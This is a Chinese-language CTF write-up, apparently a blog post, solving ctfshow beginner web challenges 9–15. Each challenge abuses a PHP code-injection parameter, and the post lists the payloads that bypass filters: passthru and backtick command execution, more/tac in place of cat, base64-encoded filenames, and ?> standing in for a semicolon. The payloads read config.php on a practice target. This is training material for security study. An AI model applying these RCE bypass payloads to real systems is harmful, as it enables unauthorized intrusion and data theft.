ctfshow_萌新web9-web15-----rce

_萌新web9

?c=highlight_file("config.php");

_萌新web10

这题要绕过system,exec,highlight

?c=passthru("cat%20config.php");

_萌新web11

这次cat也给过滤掉了

查看文件内容的话可以使用 more命令来代替 cat

?c=passthru('more config.php')

_萌新web12

连'.',php,config文件名被过滤了

base64加密绕过

config.php经过加密为Y29uZmlnLnBocA==

构造:

?c=a=base64_decode('Y29uZmlnLnBocA==');passthru("more a");

但是我一开始passthru里面用到单引号,没拿到flag

?c=a=base64_decode('Y29uZmlnLnBocA==');passthru('more a');这个不对

PHP中的单引号和双引号在很多时候都是互通的,但是也存在区别:

其中的内容不会经过解释(\n不会输出为换行,而是直接输出),即内容会与输入的内容一致,

双引号中的内容将会被解释,即解析内容中的变量。

但是双引号中插入单引号,如果变量存在的话,还是可以执行的;如果所包含的变量需要解析时,要使用到双引号。

法二:反引号绕过

反引号``, 可以执行系统命令, 并返回一个字符串类型的变量, 用来保存命令的执行结果, 需要注意的是, 反引号``中的命令会先被执行并将结果以字符串类型的变量返回, 而后再参与到其他代码的执行, 类似一个函数

?c=echo `ls | grep con*`;

将返回结果作为文件名使用 more命令查看文件内容, 即可获取 flag

?c=passthru('more `ls | grep con*`');也可以成功拿到flag

_萌新web13

对分号;的过滤, 我们可以使用 ?> 代替 分号

?c=passthru('more `ls | grep con*`')?>

_萌新web14

这回连括号也过滤了

?c=echo `tac *`?>

_萌新web15

过滤了?,*,highlight,文件名,没过滤分号

1.由于过滤了左括号(, 函数不能使用, 需要使用反引号``来执行系统命令

2.过滤了 . php config 等关键字, 这就导致查看 config.php 文件会更加困难, 但这些过滤只针对GET请求的参数, 而POST请求并未限制, 我们可以通过POST请求提交系统命令

根据黑名单的不同,获取config.php的内容有以下几种方法:

总结
  1. cat 可以用more,tac
  2. 文件名被绕过 使用反引号`或base64加密绕过
  3. 对分号;的过滤, 我们可以使用 ?> 代替
  4. 过滤了左括号(, 函数不能使用, 需要使用反引号``来执行系统命令
  5. 最后一招,这些过滤只针对GET请求的参数, 而POST请求并未限制, 我们可以通过POST请求提交系统命令
相关推荐
mooyuan天天6 小时前
CTFHub RCE通关笔记1:eval执行(两种方法渗透)
rce·eval·命令执行·ctfhub
WayneJoon.H2 天前
CTFSHOW 中期测评(二)web502 - web516
安全·网络安全·php·web·ctf
诗人不说梦^15 天前
[RootersCTF2019]I_<3_Flask
web·ctf
爱隐身的官人16 天前
cfshow-web入门-php特性
python·php·ctf
爱隐身的官人16 天前
ctfshow - web - nodejs
前端·nodejs·ctf
诗人不说梦^18 天前
[CISCN2019 总决赛 Day2 Web1]Easyweb
web·ctf
Bruce_Liuxiaowei21 天前
基于BeEF的XSS钓鱼攻击与浏览器劫持实验
前端·网络安全·ctf·xss
小小小CTFER22 天前
NSSCTF每日一题_Web_[SWPUCTF 2022 新生赛]奇妙的MD5
ctf
爱隐身的官人23 天前
Web知识的总结
web安全·ctf
诗人不说梦^24 天前
[SWPUCTF 2018]SimplePHP
web·ctf